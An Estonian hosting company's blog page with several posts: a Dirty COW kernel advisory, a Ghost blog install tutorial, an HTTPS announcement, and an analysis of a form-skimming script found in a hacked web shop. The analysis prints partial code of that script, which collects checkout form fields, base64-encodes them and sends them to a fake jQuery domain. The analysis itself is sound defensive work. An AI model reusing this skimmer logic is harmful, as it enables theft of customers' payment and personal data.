Räpased koduloomad serverites – Dirty COW

Lõbusa nime Dirty Cow taga peitub viimase aja üks ohtlikumaid Linux operatsioonisüsteemi turvanõrkuseid. Kui sinu haldusalas on Linux servereid, siis loe kindlasti mida kirjutab selle kohta Zone.ee infosüsteemide arhitekt.

cow-147576_1280Eelmisel nädalal parandati esialgu suurema kärata Linuxi kernelis mäluhalduse viga, mis on suutnud seal 9 aastat märkamatuks jääda. Peagi selgus, et asi on oluliselt tõsisem kui paranduse tekstist arvata võis – viga kasutatakse pahatahtlike häkkerite poolt juba aktiivselt ära ning tõenäoliselt on seda tehtud juba pikemat aega. Probleem on niivõrd tõsine, et sundis teenusepakkujaid üle maailma erakorralisi hooldustöid ette võtma ning on teada ka juhtumeid, kus halvima ära hoidmiseks teenustel paranduse paigaldamiseni sõna otseses mõttes juhe seinast tõmmati. Ka Zone tehnikutel olid nädala lõpus käed tööd täis. Ning nagu tõsiste turvaprobleemide puhul tänapäeval tavaline, sai probleem oma veebilehe, logo ja nime – Dirty COW.

Miks selline paanika? Lühidalt saavad süsteemi tavakasutajad leitud viga ära kasutades kirjutada mälupiirkondadesse, kuhu kirjutamise õigust neil olla ei tohiks, ning sellisel moel oma õigusi süsteemis suurendada. Koos vea avalikustamisega käivitus ka võistlus koodikirjutajate vahel – kes suudab välja tulla lihtsama ning töökindalama meetodiga, kuidas anda tavakasutajale root kasutaja õigused ja seega täielikku kontrolli kogu süsteemi üle? Tänaseks on Internetis vabalt saada mitmeid koodijuppe, mis teevad seda nii hästi, et nende kasutamine pole mingi probleem ka kõige kogenematule pahalasele. Kui alguses levis ka info, kuidas süsteemi uuendamata enda süsteeme kaitsta, siis praegu levivate ründeprogrammide vastu on need kasutud. Ainuke toimiv kaitse on kerneli uuendamine.

K: Kes/mis on mõjutatud?
V: Kõik Linuxi süsteemid, mis kasutavad kerneli versiooni 2.6.22 või uuemat. Kuna 2.6.22 ilmus aastal 2007, siis võib põhimõtteliselt vist öelda – pea kõik maailmas leiduvad Linuxid, mida pole viimase nädala jooksul tahtmatult või tahtlikult uuendatud. Alloloevast nimekirjast leiad populaarsemate Linuxi distributsioonide kernelite versioonid, kus viga juba parandatud. Kui sinu süsteemis on kerneli versiooninumber (seda saad vaadata käsuga „uname -rv“) väiksem kui tabelis, on süsteem haavatav.

 • Ubuntu 16.10 – 4.8.0-26.28
 • Ubuntu 16.04 LTS – 4.4.0-45.66
 • Ubuntu 14.04 LTS – 3.13.0-100.147
 • Ubuntu 12.04 LTS – 3.2.0-113.155
 • Debian 8 – 3.16.36-1+deb8u2
 • Debian 7 – 3.2.82-1
 • RedHat/Centos 7 – 3.10.0-327.36.3

K: Mida ma teha saan?
V: Aitab ainult kerneli uuendamine. Kui su hallata on süsteemid, mis veel uuendamata, tee seda niipea kui võimalik.

K: OK, aga mida ma Zone kliendina tegema pean?
V: Kui kasutad meie tarkvaraplatvormiga serveriteenust (nagu Virtuaalserver või Nutikas Privaatserver) või Pilverserver VPS-i, kannab uuendamise eest hoolt Zone. Küll aga pead sa ise muret tundma ja tegutsema, kui oled Privaatserveri või Pilveserver Pro SSD kasutaja.

K: Kui mu süsteemis shelli kasutajaid pole, pole probleemi?
V: Probleem on ikka, lihtsalt natuke keerulisem ära kasutada. Interneti pimedamates nurkades on juba levimas ka valmiskomplektid stiilis “WordPressi turvaveaga tavakasutajaks + räpase lehmaga root kasutajaks”. Kui su Linux on Internetiga ühendatud, on selle turvalisus ohus.

Viited

https://dirtycow.ninja/
https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html
https://security-tracker.debian.org/tracker/CVE-2016-5195
https://access.redhat.com/security/vulnerabilities/2706661

Tuntud veebipoode nakatanud pahavara luubi all

Vaatame ühe häkitud veebipoe näitel, kuidas pahavara klientide krediitkaardi andmeid varastab. Kas ja kui suur probleem see kohalike veebipoodide jaoks üldse on?

Ilmselt ei jäänud kellelgi märkamata eelmise nädala uudis pahavaraga nakatunud ja seetõttu krediitkaardi andmeid varastavate kohalike veebipoodide kohta. Probleem on reaalne, veebipoed olid tõepoolest nakatunud krediitkaardinumbreid varastava pahavaraga, samas võimalik kahju – vähemalt kohalike veebipoodide klientide jaoks – on tõenäoliselt väike või täiesti olematu.

Et aru saada, milles üldse küsimus, võtame näitena ühe tuntud veebipoe, mis nakatus selle aasta veebruari alguses ja oli seda kuni eelmise nädalani. Mõne turvaaugu kaudu (tõenäoliselt shoplift) oli lisatud veebipoe templiidifaili JavaScripti koodiblokk, mis tõmmati seeläbi käima igal lehevaatamisel. Vaatamegi nüüd, et mida see konkreetne kood siis selles veebipoes teha üritas.

Rakenduse skoop on asetatud objekti nimega grelos_v sisse:

var grelos_v = {
 snd: null,
 Glink: 'https://jquery-cloud.net/code/jquery.min.js',
 ...
}

Esimese asjana märkame kohe huvitavat viidet jQuery teegi pihta. Iseenesest sellest polekski midagi erilist, aga siinkohal on tegu pettusega. Nimelt oli jquery-cloud.net pahavara serveeriv veebiserver, mis tänaseks on juba suletud. Taoline nimetus on valitud ainult juhusliku vaataja eksitamiseks, reaalselt jQuery teegiga siin midagi pistmist ei ole. Sündmustest ette rutates võib mainida, et tegu oli veebiaadressiga, kuhu pahavara saatis kasutaja kohta kogutud informatsiooni.

myid: (function (name) {
 var matches = document.cookie.match(new RegExp('(?:^|; )' ...
 return matches ? decodeURIComponent(matches[1]) : undefined;
})('setidd') || (function () {
 ...
 var myid = ms.getTime() + "-" + ...
 document.cookie = 'setidd=' + myid + '; path=/; expires=' ...;
 return myid;
})()

Järgmiseks paneb skript paika omaduse myid, millele loetakse väärtus brauseri küpsistest, kus kasutatud küpsise võtmeks on mittemidagiütlev setidd. Juhul kui sellist küpsist ei leita, genereeritakse uus väärtus, mis koosneb hetke ajast ja juhuslikust numbrist. Seda väärtust on hiljem vaja erinevate kasutajate andmete eraldamiseks.

base64_encode: function (data) {
 var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu...
 ...
 return enc;
}

Siin ei olegi mõtet pikemat midagi arutada, nimi ütleb kõik. Funktsioon võtab sisendiks mingi väärtuse ja tagastab selle base64 kodeeringus.

clk: function () {
 var inp = document.querySelectorAll(
  "input, select, textarea, checkbox, button");
 for (var i = 0; i < inp.length; i++) {
  ...
   grelos_v.snd += inp[i].name + '=' + inp[i].value + '&';
}

See on juba huvitavam funktsioon. Nimelt otsitakse lehelt üles kõik vormielemendid ning nende väärtustest koostatakse serialiseeritud string, mis näeb natukene välja nagu www-form-urlencoded väärtus, kuigi rangelt võttes see seda siiski pole.

send: function () {
 ...
}

Nüüd jõuame rakenduse tuumani ehk funktsioonini send(). Kuna see on kõige olulisem rakenduse osa, siis vaatame selle sisu veidi lähemalt

var btn = document.querySelectorAll(
 "a[href*='javascript:void(0)'],button, input, submit, .btn, .button"
);

Funktsiooni käivitumisel otsitakse lehelt üles kõik vormielemendid, mis võiksid olla nupud. Selle jaoks kõlbavad nii <button> elemendid, elemendid CSS klassiga .btn kui ka tavalised lingid, mis kuhugi ei vii.

for (var i = 0; i < btn.length; i++) {
 var b = btn[i];
 if (b.type != 'text' && b.type != 'select' && ...
  if (b.addEventListener) {
   b.addEventListener('click', grelos_v.clk, false);
 ...

Kui nupu-laadsed elemendid on lehelt üles leitud, võetakse need ükshaaval tsükliga ette ning kontrollitakse ega tegu ei ole mõne tavalise vormielemendiga, näiteks <select> või checkbox vmt. Juhul kui ei ole, siis eeldab rakendus, et tegu ongi nupuga ja lisab sellele väidetavale nupuelemendile uue ‘click’ sündmuse, mis käivitab juba eespool nimetatud clk() meetodi.

var frm = document.querySelectorAll('form');
 for (vari = 0; i < frm.length; i++) {
  if (frm[i].addEventListener) {
   frm[i].addEventListener('submit', grelos_v.clk, false);
 ...

Siin toimub sisuliselt sama asi, ainult et nuppude asemel otsitakse lehelt kõik vormid ja lisatakse funktsiooni clk() rakendumine vormi sündmuse ‘submit’ jaoks, mis rakendub tol hetkel, kui brauser valmistub vormi andmeid veebipoe serverile saatma.

Seega siinkohal oleme sellises seisus, et kui lehel on mõni nupp ja kasutaja sellel klikib (rakendub ‘click’ või ‘submit’ sündmus), otsib funktsioon clk() lehelt üles kõik vormielemendid ja salvestab need muutujasse snd. Iseenesest on pahavara jaoks see juba üsna väärtuslik info, aga momendil on sellest veel vähe kasu, kuna see väärtus on endiselt kasutaja brauseri mälus. Vaatame aga, et mis edasi saab.

if (grelos_v.snd != null) {
 var domm = location.hostname.split('.').slice(0).join('_');
 var keym = grelos_v.base64_encode(grelos_v.snd);
 ...
 http.open('POST', grelos_v.Glink, true);
 ...
 http.send(
  'info=' + keym + '&hostname=' + domm + '&key=' + grelos_v.myid);
}

Siin toimubki siis andmete reaalne saatmine serverisse, kus pahavara keskusena on kasutusel eespool toodud võlts-jQuery link. Saadetavateks andmeteks on veebipoe domeeninimi, küpsisest võetud kasutaja ID ning base64 kodeeritult snd omadusse salvestatud vormiväljade andmed.

Ilmselgelt võiks sellise andmete edastamisega kiirelt vahele jääda, kuna nuppe on lehekülgedel palju. Liigse andmete saatmise välistab järgmine koodijupp, mis kogu kupatuse lõpuks käima tõmbab.

if (
 new RegExp('onepage|checkout|onestep', 'gi').test(window.location)
) {
 grelos_v.send();
}

Seega rakendub kogu loogika ainult nendel veebilehtele, mille veebiaadressi järgi võib arvata, et tegu on makse sooritamise lehega. Muudel lehtedel, näiteks niisama veebipoes ringi surfates, jääb pahavara kood rakendumata ja mingeid andmeid kuskile ei saadeta.

Niisiis, milles üldse probleem? Pahavara on ju üsna lihtsakoeline, mis teema nende krediitkaartidega siis on? Krediitkaartidega seob pahavara see, et traditsiooniliselt tuleb veebipoes tellimusvormi täitmisel sisestada ka oma krediitkaardi numbrid. Kui nüüd veebipoe klient on sellisel vormil andmed ära täitnud ja klikib nupul “Kinnita tellimus”, siis lisaks “päris”-kinnitusele ehk sisestatud andmete edastamisele veebipoe serverile, teeb brauser veel ühe päringu – pahavara poolt määratud veebiaadressile koos kõigi lehel olevate vormiväljade andmetega. Kui vormis olid toodud krediitkaardi numbrid, siis ongi pahalasel need väärtused nüüd kenasti käes.

Tagasi tulles kohalike veebipoodide juurde, miks ma julgen arvata, et rahalist kahju peaaegu et ei olnud või oli see väga väike. Nimelt on küsimus meie väljakujunenud online maksete süsteemis. Kuigi praeguseks suurem osa veebipoode juba võtab krediitkaardimakseid vastu (peamiselt domineerivad endiselt hoopis pangalingi protokollile ehitatud ülekanded), siis tehakse seda reeglina läbi kolmanda osapoole, olgu selleks siis Estcard (endine Pankade Kaardikeskus), Maksekeskus või kasvõi PayPal, kuna erinevalt näiteks USA veebipoodidest, ei ole meie kohalikel veebipoodidel reeglina õigust ise neid numbreid koguda. Kõik mainitud teenused suunavad kasutaja kaardinumbrite sisestamiseks veebipoe lehelt ära ja veebipood ning seega ka veebipoes paiknev pahavara neid numbreid kunagi ei näe.

Estcard ja PayPal suunavad kasutaja makse teostamiseks oma veebisaidile, Maksekeskus ning välismaised Recurly, Stripe jmt. jälle kuvavad veebipoe lehel maksevormi läbi oma <iframe> lehe, millele veebipood ise samuti ligi ei pääse. Kasutaja jaoks tundub selline <iframe> maksevorm olevat veebipoe osa, kuid tegelikkuses on see vaid illusoorne seos, veebipoe lehel käivituva JavaScripti jaoks on see täielik must kast, mille kohta on võimalik teada saada vaid selle elemendi mõõtmed, kuid mitte midagi selle elemendi sisu kohta.

Veebipood, milles asuvat pahavara koodi ma siinkohal vaatasin, kasutaski maksete kogumiseks Maksekeskuse teenust ja seega võis pahavara koguda kasutaja kohta küll mingeid andmeid, mis paraku võisid olla isegi üsna privaatsed (nimi, telefoninumber, aadress jne), kuid kasutaja krediitkaardi või muid makse andmeid see pahavara kunagi näha ei saanud.

See kõik aga ei tähenda, et kohalikud veebikaupmehed võiksid ennast mugavalt tunda ja turvalisusele mitte mõelda. Kaugel sellest. Esiteks on ka niisama privaatsete isikuandmete leke päris suur probleem (vaadeldud veebipood saatis üle poole aasta kõikide klientide andmed kes teab kuhu) ja teiseks, kui maksevormid suunduvad kolmanda osapoole serverisse, kuhu pahavaral ligipääs puudub, võib oodata tulevikus palju keerukamaid lahendusi, mis võltsivad sarnaselt tavalisele phishingule juba maksevormide vaateid ja korjavad need numbrid ikkagi kokku. Praegu kohalikel kaupmeestel veel vedas, aga seda vedamist ei pruugi väga pikalt jätkuda.

Samal teemal:

HTTPS kõikides Virtuaalserveri teenuspakettides

Kui Vinton Cerf ja Robert Kahn alustasid 1970-ndatel aastatel tööd interneti alustalaks saanud TCP/IP protokollistiku kallal, olid nad tõsise küsimuse ees – kas TCP/IP protokollistik peaks vaikimisi sisaldama ühenduste krüpteerimist?

Kui Vinton Cerf ja Robert Kahn alustasid 1970-ndatel aastatel tööd interneti alustalaks saanud TCP/IP protokollistiku kallal, olid nad tõsise küsimuse ees – kas TCP/IP protokollistik peaks vaikimisi sisaldama ühenduste krüpteerimist?

Peale asjaolude kaalumist olid nad sunnitud TCP/IP protokollistikku krüptograafia vaikesättena sisse ehitamisest loobuma järgmistel põhjustel:

 • võrguliikluse krüpteerimine ja dekrüpteerimine nõudis ressursse, mida toonane riistvara ei olnud võimeline pakkuma;
 • ei olnud päris selge, kuidas jaotada võrgus osalejate vahel andmeside krüpteerimiseks vajalikke võtmeid (töö avalikel võtmetel põhineva krüptograafia arendamise kallal alles käis);
 • Ameerika Ühendriikide riiklik julgeolekuagentuur (NSA) omas äärmiseid reservatsioone krüptograafia avalikesse või kommertsvõrkudesse levimise suhtes.

Krüptograafia implementeerimine andmeside protokollistiku teistes kihtides oli hiljem küll võimalik, kuid tänu Cerfi ja Kahni otsusele ei saanud sellest esialgu interneti loomulikku osa.

Tänaseks oleme olukorras, kus:

 • keerukateks krüptograafilisteks operatsioonideks võimeline riistvara on nutiseadmete näol jõudnud tavakodanike taskutesse;
 • krüptovõtmete vahetamine on tänu paljudele avaliku võtme taristutele äärmiselt lihtne;
 • just tänu NSA-le on nii laiemal avalikkusel kui ka ärimaailmal äärmiselt suur huvi krüpteeritud andmeside vastu.

Seetõttu on täiesti loomulik, et krüptograafia teeb internetis just praegu oma pöördumatut võidukäiku ning selle kasutus on muutumas kõikide infotehnoloogiliste lahenduste eelduseks.

Lausa nii jõuliselt, et Google kavatseb peale üleminekuperioodi oma Chrome veebilehitseja aadressiribal hakata HTTP ühendusi tähistama järgmiselt:

chrome_http_warning
Pildi allikas: Google Online Security Blog

HTTPS turvalisusKõike eelnevat arvesse võttes on mul hea meel kuulutada avalikult välja see, mida mitmed insaiderid on juba tähele pannud: Zone.ee Virtuaalserveri kõik teenuspaketid toetavad turvalisi HTTPS tühendusi.

Lisaks on ka Virtuaalserveri I paketi kasutajatel võimalik saada osa Let’s Encrypt initsiatiivil tasuta väljastatavatest TLS sertifikaatidest, mida kliendi soovi korral väljastatakse, seadistatakse ja uuendatakse Zone serverites automaatselt.

Aga see pole veel kõik. Tavakasutajate mõeldes tegime ülemineku krüpteerimata HTTP ühendustelt turvalisematele HTTPS ühendusele ka senisest mugavamaks. Nimelt lisasime Virtuaalserveri haldusliidesesse täienduse, mis võimaldab ühe nupuvajutusega suunata kogu HTTP veebiliikluse ümber krüpteeritud HTTPS protokollile:

Selle käigus tehakse varasematest seadetest sõltuvalt kuni kolm muudatust, mille jõustumine võtab umbes 10 minutit:

 1. tellitakse Let’s Encrypt sertifikaat (kui seda varem polnud tellitud)
 2. lisatakse serverile SSL tugi ja seadistatakse see kasutama tellitud sertifikaati (kui seda varem polnud tehtud)
 3. suunatakse kogu liiklus HTTPS peale kasutades 301 redirect’i

Kasutaja teha jääb vaid oma veebirakenduses baasurli muutmine. Kui täis-automaatne protsess riskantne tundub, siis võib mõistagi ka lisada Let’s Encrypt sertifikaadi, veenduda ca 10 minuti pärast HTTPS toimimises, teha veebirakenduses muudatused ja seejärel lisada kogu liikluse suunamise:

Kui HTTPS aktiveeritud loe lisaks: Kuidas kontrollida, kas HTTPS peale suunamine on õigesti tehtud? ja HTTPS ja HSTS ehk Strict-Transport-Security

Ja et tordil oleks ka kirss peal, siis on mul hea meel välja hõigata, et veel käesoleva kuu jooksul plaanime alustada kõikide uute Virtuaalserverite vaikimisi HTTPS ühendusega varustamist.

Zone Virtuaalserveri platvormile tellitud serverid, millele on tehniliselt võimalik HTTPS tuge lisada, saavad selle endale peagi vaikimisi kaasa ja mingit eraldi seadistamise vajadust enam ei ole.

Head küberturvalisuse kuud!

Ghost blogi ja Node.js Zone virtuaalserveris

Hiljuti lisandus Zone virtuaalserveri pakettides võimalus kasutada lisaks PHP-veebirakendustele ka Node.js-rakendusi

Käesolevas näites paigaldame Zone virtuaalserverisse populaarse Ghost blogimootori, mis on eelkõige tuntud oma lihtsuse ja viisaka välimuse poolest. Kui niiöelda suured blogimootorid, näiteks WordPress, võimaldavad teha kõikvõimalikke veebilehti visiitkaartidest kuni suurte e-poodideni, siis Ghost võimaldab teha vaid üht ehk siis kõige tavalisemat blogi.

Vaikimisi kasutab Ghost andmebaasina SQLite manus-andmebaasi, kuid toetatud on ka MySQL, mida proovimegi kasutada SQLite asemel. SQLite on väga mugav katsetusteks, selle tarbeks ei ole vaja paigaldada väliseid teenuseid, kuid tunduvalt ebamugavam on see haldamise mõttes, kuna sellele ei pääse “väljastpoolt” kuidagi ligi. Samuti võib tekkida probleeme Node.js versiooni uuendamisel, kuna SQLite draiver tuleb iga Node.js versiooni jaoks eraldi kompileerida. Zone virtuaalserveri pakketides on mugav MySQL tugi samas juba olemas ja seega on seda isegi lihtsam kasutusele võtta.

Alamdomeeni loomine

Esimese sammuna loome Zone haldusliideses uue alamdomeeni, millel hakkab meie Ghost blogi tööle.

ghost02

Alamdomeeni jaoks valime kõigepealt sobiva domeeninime, siin näites on selleks ghost.tahvel.info, ja seejärel määrame mod_proxy sihtpordi. Vajalik on sihtpordi määramine seetõttu, et Node.js rakendusi ei käivitata erinevalt PHP rakendustest läbi Apache, vaid siinkohal töötab Apache veebiserver hoopis veebiproksina – päringud tulevad sisse ja kui need on suunatud kindlale alamdomeenile, siis Apache suunab need lihtsalt edasi järgmisele serverile, mis juhtub kuulama mod_proxy seadetes määratud pordil. Ghost kasutab vaikimisi pordina 2368 ja selle numbri valimegi.

ghos03

Kausta väärtus ei ole siinkohal üldse oluline, kuna Apache nende failide poole ei pöördu. Seame selleks siin näites ghost, kuid reaalselt pole sellel väärtusel erilist vahet.

Koodifailide laadimine

Kui alamdomeen on olemas, tuleks saada Ghost koodifailid kuidagi meie virtuaalserverisse. Üheks võimaluseks on külastada Ghost allalaadimiste lehte ja vajalikud failid sealt zip-failina alla laadida. Seejärel tuleks need failid kas FTP või SSH abil virtuaalserverisse toimetada.

ghost01

Teine võimalus on laadida koodifailid wget käsu abil otse serverist. Seega tuleks meil logida SSH abil serverisse. Kuidas seda täpselt teha, saab lugeda siit.

Kui ühel hetkel juba serveris sees oleme, saab vajalikud failid alla laetud ja paigaldatud järgmiste käskude abil:

$ cd ~
$ wget https://ghost.org/zip/ghost-0.11.0.zip
$ unzip ghost-0.11.0.zip -d ghost
$ cd ghost

Sellega tekitasime oma kodukataloogi uue kausta ./ghost, milles asuvadki kõik Ghost koodifailid.

Paigaldame kohe ka kõik vajalikud alammoodulid, mida Ghost oma töö jaoks vajab. Vaikimisi ei taha Ghost Node.js versiooniga 6 ja uuemad töötada, eelkõige probleemide tõttu SQLite andmebaasiga, aga kuna meie seda ei kasuta, siis ei pea me ka muretsema. Ütleme lisaparameetriga, et Ghost ei kontrolliks Node.js versiooni.

$ GHOST_NODE_VERSION_CHECK=false npm install --production
Andmebaasi loomine

Edasi tuleks meil hakata rakenduse konfiguratsioonifaili looma, kuid see eeldab MySQL andmebaasi ja -kasutaja olemasolu. Pöördumegi selle jaoks tagasi Zone haldusliidesesse ja avame sektsiooni Andmebaasid ja sealt MySQL.

ghost04

Esiteks tuleks meil luua uus andmebaas. Valime baasile sobiva nime ja lisame selle.

ghost05

Kui baas on loodud, saame lisada ka andmebaasi kasutaja.

ghost06

Ja kui ka kasutaja on loodud, saame samal lehel määrata uuele kasutajale vajalikud õigused Ghost andmebaasiga toimetamiseks. Kõige lihtsam on lihtsalt klikata nupul “vali kõik,” kuid reaalselt ei lähe nimekirja lõpus olevad linnukesi siiski vaja.

ghost07

Ghost blogi seadistamine

Nüüd saame jälle minna SSH juurde tagasi ja lisame ./ghost kausta uue konfiguratsioonifaili. Üks võimalus on nimetada fail config.example.js ümber failiks config.js ja muuta selle sisu. Kuid võib selle faili ka täiesti ise teha. Konfiguratsioonifaili sisu peaks välja nägema järgmine (asenda url ning MySQL seadistuse väärtused).

var path = require('path'), config;
config = {
 production: {
  url: 'http://ghost.tahvel.info',
  mail: {
   transport: 'SMTP'
  },
  database: {
   client: 'mysql',
   connection: {
    host : 'd12345.mysql.zone.ee',
    user : 'd12345_ghost',
    password : 'Ghostpass123',
    database : 'd12345_ghost',
    charset : 'utf8'
   }
  },
  server: {
   host: '127.0.0.1',
   port: '2368'
  }
 }
};
module.exports = config;

Väärtus config.production.url hakkab olema meie blogi veebiaadress, mida kasutatakse linkide juures.

Meiliseadistuseks config.production.mail piisab vaid vajaliku transpordimehhanismi valikust, kuna Zone virtuaalserveritest saab kirju saata standardpordi kaudu ilma autentimata.

Serveri seadistus config.production.server ütleb, et meie rakendus hakkab kuulama pordil 2368 ehk sellelsamal, kuhu hakkab edaspidi Apache päringuid suunama.

Rakenduse töö seadistamine

Nüüdseks peaks meil olemas olema nii rakenduse failid, toimiv andmebaas ja rakendus olema ka korrektselt seadistatud, kuid erinevalt PHP rakendustest tuleb Node.js rakendused eraldi käima tõmmata, kuna tegu on nn. deemon tüüpi rakendustega. Zone virtuaalserverites saab selleks kasutada PM2 nimelist haldustööriista ja tekitamegi selle jaoks vastava konfiguratsioonifaili.

Konfiguratsioonifail ghost.json, mis ütleb PM2 rakenduste haldurile kuidas meie Ghost blogi jooksutada, võiks asuda meie kodukataloogis ehk seal kuhu satume, kui ssh’ga sisse logime. Faili sisu peaks välja nägema järgmine:

{
 "apps": [{
  "name": "ghost",
  "script": "./ghost/index.js",
  "cwd": "./ghost",
  "watch": true,
  "env": {
   "NODE_ENV": "production",
   "GHOST_NODE_VERSION_CHECK": "false"
  }
 }]
}
Rakenduse paigaldamine Zone haldusliideses

Nüüd peaks meil olema kõik eeldused olemas, et rakendus lõpuks ometi käivitada. Selle tarbeks avame Zone haldusliideses sektsiooni Veebiserver ja sealt alt Node.js ja PM2. Avanenud leheküljel saame lisada uue Node.js rakenduse ja rakenduse aknas tuleks meil esiteks määrata rakenduse nimi, milleks võib olla suvaline endale sobiv nimi. Seejärel tuleks öelda, et kust leiab PM2 rakenduse tööks vajaliku konfiguratsioonifaili ghost.json, mille tekitasime eelmises punktis oma kodukataloogi ja viimasena valida, et kui palju mälu me rakendusele eraldame.

ghost08

Peale lisa nupul klikkimist tuleb veidi oodata, lehekülge värskendades peaksime nägema, et teade “käivitamisel” muutub ühel hetkel “käivitatud”. Nüüd polegi enam muud, kui avada Ghost blogi aadress.

Blogi seadistamine

Kui näed blogi aadressil järgmist pilti, siis oled kõik õigesti teinud. Blogi töötab ja on kasutusvalmis.

ghost09

Muidugi on meil vaja ka kasutajakontot ja esimese, niiöelda admin konto saab luua, kui minna aadressile domeeninimi/ghost.

ghost10

ghost11

Ja kui konto juba loodud, siis polegi muud, kui postitusi kirjutama!

ghost12

UUS! Soome .fi domeenid Eesti ettevõtetele ja eraisikutele

5. septembrist hakkavad Soomes kehtima uued .fi domeenireeglid, kirjutame uutest võimalustest.

Landscape of Saimaa lake from above, Finland

Meil on hea uudis edasipürgivatele Eesti ettevõtjatele, kes tegutsevad Soome turul või plaanivad tulevikus sellele siseneda. 5. septembrist hakkavad Soomes kehtima uued .fi domeenireeglid, mis võimaldavad .fi domeene registreerida ka Eesti ettevõtetel ning eraisikutel.

Loe edasi “UUS! Soome .fi domeenid Eesti ettevõtetele ja eraisikutele”